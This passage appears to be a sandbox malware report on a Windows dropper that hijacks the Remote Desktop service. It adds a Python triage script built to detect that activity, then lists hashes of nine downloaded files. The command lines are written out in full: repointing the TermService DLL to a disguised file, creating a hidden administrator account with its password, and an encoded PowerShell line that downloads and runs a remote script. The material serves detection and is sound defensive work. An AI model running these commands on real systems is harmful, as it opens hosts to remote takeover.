Reading the tree: the dropper's first PowerShell (PID 2416, running ready.ps1 with the execution policy bypassed) does the setup under the interactive user. It compiles inline C# (the csc.exe/cvtres.exe pair with a random-named .cmdline response file is the footprint of Add-Type), moves the RDP listener to port 0x1C21 (7201), points the TermService ServiceDLL at C:\Windows\branding\mediasrv.png (the UPX-packed file from the YARA match, so the service host will load it in place of termsrv.dll), disables the WDDM display driver for Remote Desktop (fEnableWddmDriver = 0), adds NT AUTHORITY\NETWORK SERVICE to Administrators, starts rdpdr and TermService, and deletes its .ps1 and .txt files from %temp%. The later depth-1 cmd.exe entries have no parent in the tree; the PowerShell among them (PID 4704) wrote only to C:\Windows\ServiceProfiles\NetworkService and \REGISTRY\USER\S-1-5-20, so it ran as NETWORK SERVICE, the account that was just made a local administrator, which is consistent with those commands being issued by the hijacked TermService. In that context the sample clears and recreates the local user WgaUtilAcc (password a8OeqOZ0, set again at the end), puts WgaUtilAcc and the $-suffixed RJMQBVDN$ account into Remote Desktop Users, adds WgaUtilAcc to Administrators, reads the GPU and CPU names with wmic, and runs a second PowerShell whose -enc argument decodes to IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL in Malware Config above. Two PIDs are reused within the run (1428: cvtres.exe, then net.exe; 2348: cmd.exe, then net.exe), so match on parent/child pairs rather than bare PIDs when reconstructing lineage from this page.
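Everything the sample changes on the host is visible in the command lines above, which makes them the natural input for a triage check. The Python below is an added example, not part of the report or of the sample, that runs such a check over command lines transcribed from the tree: the SAMPLE_CMDLINES list, the rule labels and the regexes are my construction; the base64 blob is the report's own -enc argument. It decodes the -EncodedCommand argument the way PowerShell encoded it (base64 over UTF-16LE), pulls the URL out so it can be matched against the Malware Config entry, converts the hex PortNumber to a decimal port, and flags a TermService ServiceDLL that is anything other than termsrv.dll.

```python
import base64
import re

# The -enc argument exactly as it appears in this report's process tree.
ENCODED = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcA"
    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

# Constructed sample input: command lines transcribed from the process tree
# above, one per process that changes system state (my selection).
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    "net start TermService",
    r'"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f',
    "net.exe user WgaUtilAcc a8OeqOZ0 /add",
    'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    'net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD',
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENCODED,
]

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"'()<>]+""")


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell base64-encodes the UTF-16LE bytes of the script, which is why
    every second character of the blob is 'A' (the zero high bytes) and why a
    UTF-8 decode would give NUL-interleaved text instead of the script."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(text):
    return URL_RE.findall(text)


def reg_data(cmdline):
    """The /d data of a 'reg add' command line, quotes stripped, or None."""
    m = re.search(r'\s/d\s+("[^"]*"|\S+)', cmdline, re.IGNORECASE)
    return m.group(1).strip('"') if m else None


def rdp_port(cmdline):
    """Port written to RDP-Tcp\\PortNumber, or None if this is not that write.
    reg.exe accepts the data as hex (0x1C21) or decimal, so parse with base 0."""
    if not re.search(r"RDP-Tcp.*?/v\s+PortNumber\b", cmdline, re.IGNORECASE):
        return None
    data = reg_data(cmdline)
    return int(data, 0) if data else None


def port_detail(cmd):
    port = rdp_port(cmd)
    return None if port is None else f"RDP-Tcp PortNumber set to {port}"


def servicedll_detail(cmd):
    # The stock value is %SystemRoot%\System32\termsrv.dll; anything else is a hijack.
    data = reg_data(cmd)
    if data is None or data.lower().endswith("\\termsrv.dll"):
        return None
    return f"TermService ServiceDLL -> {data}"


# (label, pattern, detail function). A detail function returning None drops the
# finding; a detail function of None reports the command line itself.
RULES = [
    ("RDP listener port changed", r"RDP-Tcp.*?/v\s+PortNumber\b", port_detail),
    ("TermService ServiceDLL repointed", r"services\\TermService\\parameters.*?/v\s+ServiceDLL\b", servicedll_detail),
    ("Terminal Services WDDM driver disabled", r"\bfEnableWddmDriver\b.*?/d\s+0\b", None),
    ("member added to Administrators", r'\blocalgroup\s+"?administrators"?\s+.*\s/add\b', None),
    ("member added to Remote Desktop Users", r'\blocalgroup\s+"remote desktop users"\s+.*\s/add\b', None),
    ("local account created", r"\bnet(?:\.exe|1)?\s+user\s+\S+\s+\S+\s+/add\b", None),
    ("RDP-related service started", r"\bnet(?:\.exe|1)?\s+start\s+(?:TermService|rdpdr)\b", None),
    ("dropped scripts deleted", r"\bdel\s+%temp%\\\*\.(?:ps1|txt)\b", None),
    ("PowerShell execution policy bypassed", r"-(?:ep|executionpolicy)\s+bypass\b", None),
]


def triage(cmdlines):
    """Apply every rule to every command line; returns (label, detail) pairs."""
    findings = []
    for cmd in cmdlines:
        for label, pattern, detail_fn in RULES:
            if not re.search(pattern, cmd, re.IGNORECASE):
                continue
            detail = cmd if detail_fn is None else detail_fn(cmd)
            if detail is not None:
                findings.append((label, detail))
        decoded = decode_encoded_command(cmd)
        if decoded:
            for url in extract_urls(decoded):
                findings.append(("encoded PowerShell fetches", url))
    return findings


if __name__ == "__main__":
    for label, detail in triage(SAMPLE_CMDLINES):
        print(f"{label}: {detail}")
```

Run as a script it prints eleven findings for the ten sample lines. The same functions apply unchanged to the command-line field of Sysmon event 1 or Security event 4688, which is where these patterns would be hunted on a real host; the ServiceDLL check deliberately suppresses the stock termsrv.dll value so that a legitimate repair of the key does not fire.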
Network
MITRE ATT&CK Enterprise v6
Downloads
Nine files were retrieved during the run; the page records only their hashes (no URLs or file names).

1.
MD5: 8307b1ccd9644ce9fca4e1e69cd4a3f1
SHA1: e8c60fbe21eeb0cc9666e40c6789864422223b6f
SHA256: f1a0be8ca304128474019504bc192fb896d58fe3c6f96ece7ff3857c7f0d8f81
SHA512: 09dd084a96ee5d89cc8d9c7fa07f9506d28822e7a34327dc42677de45340d935ced4605667b64b4afb4c4ee7b4765646626329321dc2be6598d9f360f0ffe1d3

2.
MD5: 736174f3b5b458ba1d217896a14f4b0f
SHA1: 7ae1b95420d1a255777a82be4f48ff8f03a04b4f
SHA256: cb5f85407b0e80ed898a3f1bf58db26065f57af31cb2f6c697166db509ac9dad
SHA512: e656ebcb3d53a77dc810dc776e24ad7fd854fff604642557e0bf92e4ecc95af74816ebe63a66689541b1ae0fdd4f3dddcb873e0a5430d61271502e1fa0393883

3.
MD5: 3447df88de7128bdc34942334b2fab98
SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

4.
MD5: 43473f4e719958639a9d89e5d8388999
SHA1: ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256: ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512: 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

5.
MD5: 4864fc038c0b4d61f508d402317c6e9a
SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

6.
MD5: d722ad1eacd192e12df0ba2fb28951b4
SHA1: d22ba3ccb96380f57c0b1a639597a2fd84d3b090
SHA256: e813cefcca45cc4fa9959a53f2af1a877296eab8ad9312175bb3abf100b092b0
SHA512: afb7c694fdb5139f4ccec4ac9103dc4aec6a96fd20113e0bdefc1e1bdcde3f86e773757b71e7e35c38dad44f24ea260aa5885aaa5cbcb88fdbfffc56d29de23b

7.
MD5: 7068c371e467d4f1f0ef646581709c79
SHA1: 04a6971a0ac7026230918bdd618764be707f0216
SHA256: db30b6120715a4d1f2e30c58a1892dca24af57f1f0e2826cf203167e44d854c1
SHA512: 6fc5ab8e42b065d07741964be6bd12f1e2118178126cfec8c665b3b3467398fc8638d7ed6ffa7833c88a178b39ad037fbaec243ded8d25fe0109fb22cc78dbeb

8.
MD5: 271eacd9c9ec8531912e043bc9c58a31
SHA1: c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256: 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512: 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

9.
MD5: 1fa9c1e185a51b6ed443dd782b880b0d
SHA1: 50145abf336a196183882ef960d285bd77dd3490
SHA256: f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512: 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc